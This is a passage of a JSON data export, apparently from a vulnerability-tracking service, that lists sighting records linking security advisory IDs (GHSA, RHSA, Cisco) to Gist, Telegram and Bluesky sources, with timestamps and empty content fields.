"5f8f3b62-f70b-4217-8ec9-7f62c12ccd46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-386q-5hp3-95m9", "type": "seen", "source": "https://gist.github.com/alon710/18c642199d3d87ef43a0391f4cc215a6", "content": "", "creation_timestamp": "2026-07-29T11:31:22.561774Z"}, {"uuid": "15b31cb6-4baa-450a-bdb3-4ef3e034d7ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-H956-RH7X-PPGJ", "type": "seen", "source": "https://t.me/itpgchannel/3747", "content": "", "creation_timestamp": "2026-07-29T12:00:04.814978Z"}, {"uuid": "22489286-6187-4e28-a3bb-9bc9416e16f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "RHSA-2020:0630", "type": "seen", "source": "https://t.me/linux_news/622", "content": "", "creation_timestamp": "2026-07-29T12:03:23.461910Z"}, {"uuid": "e8a6fc6c-6905-4431-a232-4d6acc53da4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M42G-XG4C-5F3H", "type": "seen", "source": "https://t.me/shmelovod/934", "content": "", "creation_timestamp": "2026-07-29T12:03:22.447895Z"}, {"uuid": "0d19e7c9-4ca6-47e3-9460-8c1836e0236c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7JXR-CG7F-GPGV", "type": "seen", "source": "https://t.me/sysadm_in_up/1645", "content": "", "creation_timestamp": "2026-07-29T12:03:19.357092Z"}, {"uuid": "ca9ab8b7-0015-439c-b2cb-f6653ec582b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MJ4W-6495-6CRX", "type": "seen", "source": "https://t.me/sysadm_in_up/1639", "content": "", "creation_timestamp": "2026-07-29T12:03:19.329795Z"}, {"uuid": "8467fc50-b826-4e27-94c1-af440c2113ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WFMF-8626-Q3R3", "type": "seen", "source": "https://t.me/sysadm_in_up/2354", "content": "", "creation_timestamp": "2026-07-29T12:03:16.319045Z"}, {"uuid": "e502298c-c02b-489d-900a-b6cb6c855233", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W4GV-VW3F-29G3", "type": "seen", "source": "https://t.me/sysadm_in_up/2422", "content": "", "creation_timestamp": "2026-07-29T12:03:15.989862Z"}, {"uuid": "f1338e53-d31e-4370-a029-83bf65ff6bec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F55J-VVR9-69XV", "type": "seen", "source": "https://t.me/sysadm_in_up/2554", "content": "", "creation_timestamp": "2026-07-29T12:03:14.043174Z"}, {"uuid": "358ff077-613e-4840-827b-7e1f2eeded1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GV7G-JM28-CR3M", "type": "seen", "source": "https://t.me/S_E_Reborn/6502", "content": "", "creation_timestamp": "2026-07-30T00:03:19.704344Z"}, {"uuid": "a5878707-388b-4ced-81c7-03a65b353f1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180328-QOS", "type": "published-proof-of-concept", "source": "https://t.me/KaitNews/7710", "content": "", "creation_timestamp": "2026-07-30T00:03:17.811287Z"}, {"uuid": "ef897fbd-31de-4edc-a02e-f66e6f8d3149", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180409-SMI", "type": "seen", "source": "https://t.me/KaitNews/7703", "content": "", "creation_timestamp": "2026-07-30T00:03:17.458275Z"}, {"uuid": "924559ed-54a8-4a1e-9d27-c63bee72147e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180129-ASA1", "type": "seen", "source": "https://t.me/KaitNews/7528", "content": "", "creation_timestamp": "2026-07-30T00:03:17.171957Z"}, {"uuid": "39527f1d-ce51-4fb8-8dec-2b9421f00af9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "RHSA-2020:0630", "type": "seen", "source": "https://t.me/linux_news/622", "content": "", "creation_timestamp": "2026-07-30T00:03:08.982304Z"}, {"uuid": "96cf8af6-1642-4d73-940c-992061f32148", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M42G-XG4C-5F3H", "type": "seen", "source": "https://t.me/shmelovod/934", "content": "", "creation_timestamp": "2026-07-30T00:03:08.012454Z"}, {"uuid": "5835d767-9609-458a-aea3-e8680c9422ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7JXR-CG7F-GPGV", "type": "seen", "source": "https://t.me/sysadm_in_up/1645", "content": "", "creation_timestamp": "2026-07-30T00:03:05.110591Z"}, {"uuid": "b3c4a29b-8181-4430-a073-718051ccb185", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MJ4W-6495-6CRX", "type": "seen", "source": "https://t.me/sysadm_in_up/1639", "content": "", "creation_timestamp": "2026-07-30T00:03:05.088856Z"}, {"uuid": "545e7b75-d9e1-41bf-8333-ad1490b77352", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WFMF-8626-Q3R3", "type": "seen", "source": "https://t.me/sysadm_in_up/2354", "content": "", "creation_timestamp": "2026-07-30T00:03:00.987775Z"}, {"uuid": "e6a45984-9de6-416a-b4f7-dc8a85132f9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W4GV-VW3F-29G3", "type": "seen", "source": "https://t.me/sysadm_in_up/2422", "content": "", "creation_timestamp": "2026-07-30T00:03:00.633541Z"}, {"uuid": "1c4e92da-1235-4796-81b8-69ddf99015d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F55J-VVR9-69XV", "type": "seen", "source": "https://t.me/sysadm_in_up/2554", "content": "", "creation_timestamp": "2026-07-30T00:03:00.047483Z"}, {"uuid": "87bb7d25-9ce6-472c-90df-94aa278eb3b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9xq3-3fqg-4vg7", "type": "seen", "source": "https://gist.github.com/alon710/3dfab3b451ecd01d7d3ac084db088fec", "content": "", "creation_timestamp": "2026-07-30T01:32:06.428428Z"}, {"uuid": "975457e9-0492-457b-a8e3-3aad3d917395", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-996f-334j-67g7", "type": "seen", "source": "https://gist.github.com/alon710/a3242bec311706e278c5de9e07dda21c", "content": "", "creation_timestamp": "2026-07-30T02:32:04.987509Z"}, {"uuid": "f7723e3b-798e-4ec1-a612-41319c112846", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8hm4-r66f-29wr", "type": "seen", "source": "https://gist.github.com/alon710/555463e864b3e92acb0ee1bba5502d4f", "content": "", "creation_timestamp": "2026-07-30T03:31:37.512489Z"}, {"uuid": "b2da57de-7892-4495-8bad-231f1600396f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xgr6-pqjv-3pf8", "type": "seen", "source": "https://gist.github.com/alon710/2d94cc50795411681f41b69ad6e69380", "content": "", "creation_timestamp": "2026-07-30T04:31:31.173634Z"}, {"uuid": "e5d8cdd0-6a3b-4bfd-85ff-0b607466037d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w8xc-8g92-v77h", "type": "seen", "source": "https://gist.github.com/alon710/5694b6f230218930632a6e462097e637", "content": "", "creation_timestamp": "2026-07-30T05:31:24.670709Z"}, {"uuid": "a1ebd308-adfc-4853-8ccf-6aee1ecf88e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pm5p-7w5h-jm5q", "type": "seen", "source": "https://gist.github.com/alon710/5f2d10f3a54edb2e4c4f46ec9659b74e", "content": "", "creation_timestamp": "2026-07-30T06:31:29.683868Z"}, {"uuid": "1ee47d4f-f258-40ed-8b23-30e18a11b6ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JR9P-4H4J-6C58", "type": "seen", "source": "https://t.me/GithubRedTeam/95796", "content": "", "creation_timestamp": "2026-07-30T07:00:03.854547Z"}, {"uuid": "7ddfdf49-f60e-43a8-bd1e-843b02a482a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4vmm-5qvc-w5p7", "type": "seen", "source": "https://gist.github.com/alon710/eef1157f11956461ac0859c3d9d6253b", "content": "", "creation_timestamp": "2026-07-30T07:31:43.739577Z"}, {"uuid": "054aa655-2eff-4a7a-acb8-0a798ddc146d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wchh-9x6h-7f6p", "type": "seen", "source": "https://gist.github.com/alon710/d12f2b2b8a8eb557d027885a6580665a", "content": "", "creation_timestamp": "2026-07-30T08:32:07.480598Z"}, {"uuid": "80ec897a-cf8c-4dde-9744-f34bfce02069", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hw6g-j8v6-9hcm", "type": "seen", "source": "https://gist.github.com/alon710/d12f2b2b8a8eb557d027885a6580665a", "content": "", "creation_timestamp": "2026-07-30T08:32:07.454824Z"}, {"uuid": "fbe1052f-6da3-43e3-93ea-efeef590d5ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m4x6-gwgp-4pm7", "type": "seen", "source": "https://gist.github.com/alon710/7771115a3d9e03361e58ecd1b540d28d", "content": "", "creation_timestamp": "2026-07-30T09:32:05.475827Z"}, {"uuid": "e3f0adf9-03ec-440c-965d-109e2f87f63c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xr9x-r78c-5hrm", "type": "seen", "source": "https://bsky.app/profile/nixpkgssecuritychanges.gerbet.me/post/3mrudy2kgin2f", "content": "", "creation_timestamp": "2026-07-30T11:36:36.813453Z"}, {"uuid": "23252d05-8a8d-4d51-a08e-4cf3c53a7a34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PC2W-4MQ8-32QW", "type": "seen", "source": "https://gist.github.com/alon710/fcc454540fcb39a9b7c00ee410e47a9e", "content": "", "creation_timestamp": "2026-07-30T11:31:05.843762Z"}, {"uuid": "e0add544-36a2-4604-a9e6-4552fca00233", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xr9x-r78c-5hrm", "type": "seen", "source": "https://bsky.app/profile/nixpkgssecuritychanges.gerbet.me/post/3mrukk3nzjy2o", "content": "", "creation_timestamp": "2026-07-30T13:34:04.470219Z"}, {"uuid": "0d418781-1bb7-4781-87cc-10a53d139b3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JR9P-4H4J-6C58", "type": "seen", "source": "Telegram/47AGWfAWFIwZKzQcl_sisfXazYjpo74QYaHVlY-riLjwoTE", "content": "", "creation_timestamp": "2026-07-30T14:00:04.851327Z"}, {"uuid": "c4e5e0c1-a918-43c6-ad6f-c5b4e2724842", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xr9x-r78c-5hrm", "type": "seen", "source": "https://gist.github.com/cskartikey/e1db6fa823980f7d870432de59e29462", "content": "", "creation_timestamp": "2026-07-30T14:46:38.437223Z"}, {"uuid": "1d1b16ce-3273-49db-8b56-cdf4f563b35d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c9hr-64h3-gxpc", "type": "seen", "source": "https://gist.github.com/alon710/5c4b46a299dac54e7caa99802f7ad9a8", "content": "", "creation_timestamp": "2026-07-30T15:31:53.989322Z"}, {"uuid": "812811ac-0c15-4578-a3cd-af4b96bdcda8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xr9x-r78c-5hrm", "type": "seen", "source": "https://bsky.app/profile/pmorinerie.mastodon.xyz.ap.brid.gy/post/3mrustbzfclq2", "content": "", "creation_timestamp": "2026-07-30T16:02:30.390311Z"}, {"uuid": "44a1f9aa-375e-4913-a0ec-dcf9d98b5ee4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pgwh-4jj4-qm8v", "type": "seen", "source": "https://gist.github.com/alon710/abbfb678b2ea15b959183e89124a0f42", "content": "", "creation_timestamp": "2026-07-30T16:30:59.692518Z"}, {"uuid": "e591b3fb-fb1f-4275-b3a9-f03ba3492f75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4rcq-jv2f-898j", "type": "seen", "source": "https://gist.github.com/tu-trinh-scale/6952882fc494bc673397ec58f04a6e92", "content": "", "creation_timestamp": "2026-07-30T16:49:58.772587Z"}, {"uuid": "54c88205-97bb-4666-8b17-0db8709e5bc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vw27-fwjf-5qxm", "type": "seen", "source": "https://gist.github.com/tu-trinh-scale/6952882fc494bc673397ec58f04a6e92", "content": "", "creation_timestamp": "2026-07-30T16:49:48.376703Z"}, {"uuid": "012bc093-5cc4-488d-8293-3189fbb6a178", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4mrv-5p47-p938", "type": "seen", "source": "https://gist.github.com/alon710/f9483ca84f65ab9c98c78744c876def1", "content": "", "creation_timestamp": "2026-07-30T17:31:24.278397Z"}, {"uuid": "646ec7c0-4265-4022-81f2-12d8d6e42742", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cg4g-m8jx-vjv2", "type": "seen", "source": "https://gist.github.com/alon710/a4455529dbdac06b73f9e7a68363941a", "content": "", "creation_timestamp": "2026-07-30T18:31:07.045195Z"}, {"uuid": "edb5cf0c-f52b-4acc-bf23-0d9ac8aac299", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4rcq-jv2f-898j", "type": "seen", "source": "https://gist.github.com/tu-trinh-scale/78b43101caf0a2889d878bc26f12532e", "content": "", "creation_timestamp": "2026-07-30T19:34:08.382858Z"}, {"uuid": "3766968d-4aff-4360-83ec-94759b0e4f59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vw27-fwjf-5qxm", "type": "seen", "source": "https://gist.github.com/tu-trinh-scale/78b43101caf0a2889d878bc26f12532e", "content": "", "creation_timestamp": "2026-07-30T19:33:48.152743Z"}, {"uuid": "6c4f00a0-50cf-4d75-b52d-b378352f0d0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4rcq-jv2f-898j", "type": "seen", "source": "https://gist.github.com/tu-trinh-scale/cdec105f804c8b4962d64774b7f2237d", "content": "", "creation_timestamp": "2026-07-30T19:33:45.868981Z"}, {"uuid": "9dbeda41-6546-4e9d-b68f-091757ac6c2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vw27-fwjf-5qxm", "type": "seen", "source": "https://gist.github.com/tu-trinh-scale/cdec105f804c8b4962d64774b7f2237d", "content": "", "creation_timestamp": "2026-07-30T19:33:36.239889Z"}, {"uuid": "d4e3d0cc-dc55-4caa-851e-8fe84e5b8d68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xr9x-r78c-5hrm", "type": "seen", "source": "https://gist.github.com/alon710/91befcf1d9482b0b57392c974c405ba5", "content": "", "creation_timestamp": "2026-07-30T19:31:45.005662Z"}, {"uuid": "67cd4d4a-679a-464e-ad13-daf8efc05541", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4rcq-jv2f-898j", "type": "seen", "source": "https://gist.github.com/tu-trinh-scale/04002ae027b5b8d8be96f4e475729951", "content": "", "creation_timestamp": "2026-07-30T20:36:48.981505Z"}, {"uuid": "9427e871-b56a-4926-b4dc-7b8a93b907fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vw27-fwjf-5qxm", "type": "seen", "source": "https://gist.github.com/tu-trinh-scale/04002ae027b5b8d8be96f4e475729951", "content": "", "creation_timestamp": "2026-07-30T20:36:37.303981Z"}, {"uuid": "9a854a5a-0118-40e6-a76f-92597d3d81ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4rcq-jv2f-898j", "type": "seen", "source": "https://gist.github.com/tu-trinh-scale/59ec800c6d4eb5caeefdfca2353b2e8a", "content": "", "creation_timestamp": "2026-07-30T20:36:34.687784Z"}, {"uuid": "dba19385-f9c3-4656-b5f5-bbe7c8cb11cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vw27-fwjf-5qxm", "type": "seen", "source": "https://gist.github.com/tu-trinh-scale/59ec800c6d4eb5caeefdfca2353b2e8a", "content": "", "creation_timestamp": "2026-07-30T20:36:16.109952Z"}, {"uuid": "1b4926e1-ab99-4dd4-87a1-b40d126fee7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jx74-cqjv-2c67", "type": "seen", "source": "https://gist.github.com/alon710/c5ece1b4b71f33d4bb332d0422fd7596", "content": "", "creation_timestamp": "2026-07-30T20:33:08.630533Z"}, {"uuid": "bd563105-31d3-4288-a789-23fc9ad8b9fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xrmj-5g4g-8987", "type": "seen", "source": "https://gist.github.com/alon710/e1fe3e68fe3d799c84bb3e82e35d7e46", "content": "", "creation_timestamp": "2026-07-31T16:33:01.031158Z"}, {"uuid": "e3e4f826-0f78-4c2c-9e72-a5aa64b92eff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5846-7qm3-r52j", "type": "seen", "source": "https://gist.github.com/alon710/3725c6658b9e4e7f9bed06e9ce214b76", "content": "", "creation_timestamp": "2026-07-31T17:31:37.554859Z"}, {"uuid": "6fa690c3-bd82-4994-bfc1-0b88ab5ecf89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mj3g-7xcc-x4vh", "type": "seen", "source": "https://gist.github.com/alon710/3afa9bbe175e1dfd1649cd2081ad6eb5", "content": "", "creation_timestamp": "2026-07-31T18:32:14.044286Z"}, {"uuid": "59be47bf-531a-46a0-a184-0c6fdfd4f200", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4328-8hgf-7wjr", "type": "seen", "source": "https://gist.github.com/konard/91df17bf902150322c465ca6b6479053", "content": "", "creation_timestamp": "2026-07-31T19:38:28.831320Z"}, {"uuid": "0c83ed7b-da94-495c-ae7d-6d603135c9e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5vjc-7cxw-4w6j", "type": "seen", "source": "https://gist.github.com/alon710/de1c5b8263f3d3a5d1101a3c2a0269ab", "content": "", "creation_timestamp": "2026-07-31T19:31:28.836999Z"}, {"uuid": "2d1e7b27-58b3-43e9-adfb-dffbc0a75be0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3WHF-VGF2-9W6G", "type": "seen", "source": "https://gist.github.com/alon710/124f7bf887e5079fb15a66958a9543ef", "content": "", "creation_timestamp": "2026-07-31T20:31:22.067910Z"}, {"uuid": "c47f6d9c-09e6-4f87-aeb3-75edc0b7ad7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qj55-47fp-p62j", "type": "seen", "source": "https://gist.github.com/alon710/0f09a6f6c7f9c253322faa348755ead8", "content": "", "creation_timestamp": "2026-07-31T21:31:45.153161Z"}, {"uuid": "98cfeabc-7314-44ad-b183-e00116a4e264", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wqqc-jjcq-vfxm", "type": "seen", "source": "https://gist.github.com/alon710/f7703eb7ff99ed9d3ada7f401de565eb", "content": "", "creation_timestamp": "2026-07-31T22:32:31.578989Z"}, {"uuid": "14be504a-ffd3-41b3-92bc-8dfd5e991f59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vvp7-h4fj-m28w", "type": "seen", "source": "https://gist.github.com/alon710/9fa87dd82b0216d33fe7579c4687415f", "content": "", "creation_timestamp": "2026-07-31T23:31:28.563402Z"}, {"uuid": "facd0064-96cf-403f-aa35-640e9c48af0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RCR6-4JQH-J84M", "type": "published-proof-of-concept", "source": "https://t.me/cyberwarehouse/1178", "content": "", "creation_timestamp": "2026-08-01T00:00:39.424778Z"}, {"uuid": "a77b58af-e79a-4481-9921-6c0c5dafeb82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XR9X-R78C-5HRM", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3355", "content": "", "creation_timestamp": "2026-08-01T00:00:29.845455Z"}, {"uuid": "789f2900-ddee-4acc-88a7-b11fb8a44fab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wqqc-jjcq-vfxm", "type": "seen", "source": "https://gist.github.com/alon710/f7703eb7ff99ed9d3ada7f401de565eb", "content": "", "creation_timestamp": "2026-08-01T00:00:16.208611Z"}, {"uuid": "c6c95d1e-dc76-4444-9c43-85318fbeeed5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vvp7-h4fj-m28w", "type": "seen", "source": "https://gist.github.com/alon710/9fa87dd82b0216d33fe7579c4687415f", "content": "", "creation_timestamp": "2026-08-01T00:00:16.110760Z"}, {"uuid": "dda27084-e1aa-4e16-acf3-c2d305342dc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W9VV-Q986-VJ7X", "type": "seen", "source": "https://t.me/hn_best_comments/30331", "content": "", "creation_timestamp": "2026-08-02T00:01:12.575367Z"}, {"uuid": "aaf6a5a3-8e72-49df-a6ef-8b7ab52f6654", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "RHSA-2020:4157", "type": "seen", "source": "Telegram/FZOsY2k7WJ6AFbS8POLza0WyKoHuy17v_x6w4oGouFfsv88", "content": "", "creation_timestamp": "2026-08-02T00:01:09.077108Z"}, {"uuid": "939381e5-d657-4fa4-93aa-8eafd2fb765f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180328-BFD", "type": "published-proof-of-concept", "source": "Telegram/hGorQbjXAWCmitjk3p41x3VI_IGJuK055h4LBYzY57_Q4Q", "content": "", "creation_timestamp": "2026-08-02T00:00:45.015958Z"}, {"uuid": "7ae94214-d432-4ac6-8c23-dd084858d1e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PW56-C55X-CM9M", "type": "seen", "source": "https://t.me/reverseame/2897", "content": "", "creation_timestamp": "2026-08-02T21:10:25.062115Z"}, {"uuid": "537071a6-800b-434a-87a4-c9e423ad0a0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PW56-C55X-CM9M", "type": "seen", "source": "https://t.me/reverseame/2897", "content": "", "creation_timestamp": "2026-08-03T00:57:01.272675Z"}, {"uuid": "7edd1831-112e-4164-83d6-25a61e9f80d9", "vulnerability_lookup_origin": 